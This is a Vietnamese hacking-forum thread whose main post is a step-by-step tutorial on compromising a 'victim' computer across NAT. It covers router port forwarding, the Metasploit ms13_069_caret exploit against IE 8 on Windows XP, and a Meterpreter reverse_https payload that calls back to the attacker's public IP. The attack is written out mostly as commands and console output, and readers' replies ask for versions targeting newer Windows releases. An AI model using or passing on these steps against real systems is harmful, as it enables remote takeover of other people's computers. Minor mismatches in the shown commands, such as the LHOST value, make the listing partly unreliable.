Mô hình hacking một máy tính thông qua Internet

Hackerstudent93

VIP Members
30/09/2013
38
340 bài viết
Mô hình hacking một máy tính thông qua Internet
Hi all,

Hôm nay mình đã trờ lại và trong bài viết nhở này chúng ta sẽ xem xét làm thế nào để cấu hình một cách chính xác Meterpreter Payload và làm chúng hoạt động khi tấn công của bạn là phía sau NAT. Thậm chí nếu cả 2 mục tiêu là: hacker và nạn nhân đều phía sau NAT. Có lẽ tôi sẽ khai thác một trình duyệt để chứng minh điều này.

Mô hình:

1489939947image_4920.png

Như các bạn có thể nhìn thấy. Cả hacker và nạn nhân là phía sau NAT, làm thế nào để đột nhập vào máy này bây giờ ???
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Hello everyone :)
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bài hay, thanks
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Tiếp nữa đi bác. giả dụ trong trường hợp dùng win xp, win 7, win 8, win 8.1 và win 10 thì cách thức tấn công như thế nào bác. em đã làm đồ án trên win xp và win 7 đã thành công nhờ hướng dẫn của bác
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Tiếp theo:
Chúng ta sẽ giả định rằng đối phương có khả khả năng kết nối đến Internet qua Port 80 và 443
Tôi sẽ sử dụng Kali Linux như những kẻ tấn công, Metasploit thì đã có sẵn trên kali linux. Vui lòng chắc rằng bạn đã cập nhật Metasploit phiên bản mới nhất trên Kali Linux.
Tôi sẽ khác thác trình duyệt Inetnet Explorer 8 vì nó đã lỗi thời và chứa rất nhiều lỗ hỏng bảo mật dễ bị tấn công :)
Ý tưởng là để cấu hình Router/Firewall để traffic tới các IP Public (1.1.1.1) của Router sẽ được forward đến IP Hacker (192.168.0.187) trên các cổng 80 và 443. Vui lòng chắc chắn để kiểm tra xem cổng 80 và 443 không được sử dụng bởi Router/Firewall.

Đầu tiên chúng ta cần xác minh rằng forwarding đang làm việc.
Trên Kali tạo một tập tin hmtl nhở và lưu nó dưới /tmp
Mã:
root@kali:~# cd /tmp
root@kali:/tmp# echo "It works" > test.html

Từ thư mục chứa các file test.html chạy lệnh python này.

Mã:
root@kali:/tmp# python -m SimpleHTTPServer 443
Serving HTTP on 0.0.0.0 port 443 ...
192.168.1.26 - - [04/Dec/2015 10:29:24] "GET /test.html HTTP/1.1" 200 -
192.168.1.26 - - [04/Dec/2015 10:29:24] code 404, message File not found
192.168.1.26 - - [04/Dec/2015 10:29:24] "GET /favicon.ico HTTP/1.1" 404 -
192.168.1.26 - - [04/Dec/2015 10:29:24] code 404, message File not found
192.168.1.26 - - [04/Dec/2015 10:29:24] "GET /favicon.ico HTTP/1.1" 404 -

Nếu bây giờ bạn kết nối đến http://192.168.1.26:443/test.html bạn sẽ thấy:



Bây giờ. Trên một máy tính bất kỳ ngoài Inetnet gõ http://1.1.1.1/test.html ( thay IP 1.1.1.1 bằng IP Public của bạn ) nếu bạn nhìn thấy trang này chứng tở forwarding đã được cấu hình chính xác và đang làm việc tốt. nếu không bạn cần kiểm tra lại cấu hình forwarding . Hướng dẫn cấu hình nằm ngoài phạm vi bài viết tôi để cho các bạn tự tìm hiểu ;)

Lưu ý: forwarding thì đang làm việc chính xác cho cả 2 cổng 80 và 443. test thêm điều này.

Mã:
root@kali:~# cd /tmp
root@kali:/tmp# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
192.168.1.26 - - [04/Dec/2015 11:01:15] "GET /test.html HTTP/1.1" 200 -
Metasploit Configruration

Tôi sẽ sử dụng ms13_069_caret.rb để khai thác.

Mã:
msf > use exploit/windows/browser/ms13_069_caret
msf exploit(ms13_069_caret) > show options

Module options (exploit/windows/browser/ms13_069_caret):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   IE 8 on Windows XP SP3


msf exploit(ms13_069_caret) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms13_069_caret) > set URIPATH /
URIPATH => /
msf exploit(ms13_069_caret) >

Kế tiếp chúng ta sẽ lựa chọn meterpreter reverse_https payload for windows. Chạy show options một lần nữa và chúng ta sẽ nhìn thấy điều này.

Mã:
msf exploit(ms13_069_caret) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(ms13_069_caret) > show options

Module options (exploit/windows/browser/ms13_069_caret):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  80               yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /                no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: ', seh, thread, process, none)
   LHOST                      yes       The local listener hostname
   LPORT     8443             yes       The local listener port


Exploit target:

   Id  Name
   --  ----
   0   IE 8 on Windows XP SP3


msf exploit(ms13_069_caret) >
msf exploit(ms13_069_caret) > set LPORT 443
LPORT => 443
msf exploit(ms13_069_caret) > set LHOST 1.55.109.2. ( YOUR IP PUBLIC)
LHOST => 1.1.1.1
Mã:
Chúng ta có thể nói cho nó biết để lắng nghe trên IP LAN

[CODE]
msf exploit(ms13_069_caret) > set ReverseListenerBindAddress 192.168.1.26
ReverseListenerBindAddress => 192.168.1.26

Mã:
msf exploit(ms13_069_caret) > exploit
[*]Exploit running as background job.
[*]Started HTTPS reverse handler on https://192.168.1.26:443/
[*]Using URL: http://0.0.0.0:80/
[*]Local IP: http://192.168.1.26:80/
[*]Server started.
msf exploit(ms13_069_caret) >

Nếu bây giờ chúng ta sử dụng IE 8 trên máy nạn nhân và kết nối với IP Public của Hacker. Chúng ta sẽ thấy điều này.

Mã:
msf exploit(ms13_069_caret) >
[*]2.2.2.2   ms13_069_caret - Sending exploit...
[*]2.2.2.2   ms13_069_caret - Sending exploit...
[*]2.2.2.2:53893 Request received for /NtFT...
[*]2.2.2.2:53893 Staging connection for target /NtFT received...
[*]Patched user-agent at offset 663128...
[*]Patched transport at offset 662792...
[*]Patched URL at offset 662856...
[*]Patched Expiration Timeout at offset 663728...
[*]Patched Communication Timeout at offset 663732...

Note:

SRVHOST : 0.0.0.0
SRVPORT : set to the port where you want to host the browser exploit
LHOST : the attacker public IP
LPORT : set to the port where you want to serve the Meterpreter handler
ReverseListenerBindAddress : LAN IP (optional)

Screenshot from 2015-12-04 10:29:46.jpg
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Mệt rồi! Tạm thời tôi đi ngủ cái đã. mai rảnh sẽ xem lại có bị hoat mắt gõ sai chỗ nào không ;)
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
duc_2712;n53695 đã viết:
Tiếp nữa đi bác. giả dụ trong trường hợp dùng win xp, win 7, win 8, win 8.1 và win 10 thì cách thức tấn công như thế nào bác. em đã làm đồ án trên win xp và win 7 đã thành công nhờ hướng dẫn của bác

Bạn có thể tham khảo bài viết của mình ở trên nhé. Nhưng bạn đã làm đồ án thành công trên win xp và win 7 nhờ hướng dẫn của mình. Mình đang tò mò là không biết bài nào nhỉ ? trên diễn đàn có rất nhiều bài của mình ;)
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bài này good Thanks...........................
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
cần lắm một bài hướng dẫn chất lượng :)
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Sao mình k thấy link hay bài hướng dẫn gì hết mà bạn.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
tieulyit;n53887 đã viết:
Sao mình k thấy link hay bài hướng dẫn gì hết mà bạn.

Bài hướng dẫn của mình ở trên rồi mà. Bạn muốn hỏi link hay bài hướng dẫn nào mới được ? :)
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Điều kiện hoàn hảo tuyệt đối: IE
Imposible :D
Bài viết hay, thanks bác :D
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Thẻ
hack máy tính hack máy tính qua internet
Bên trên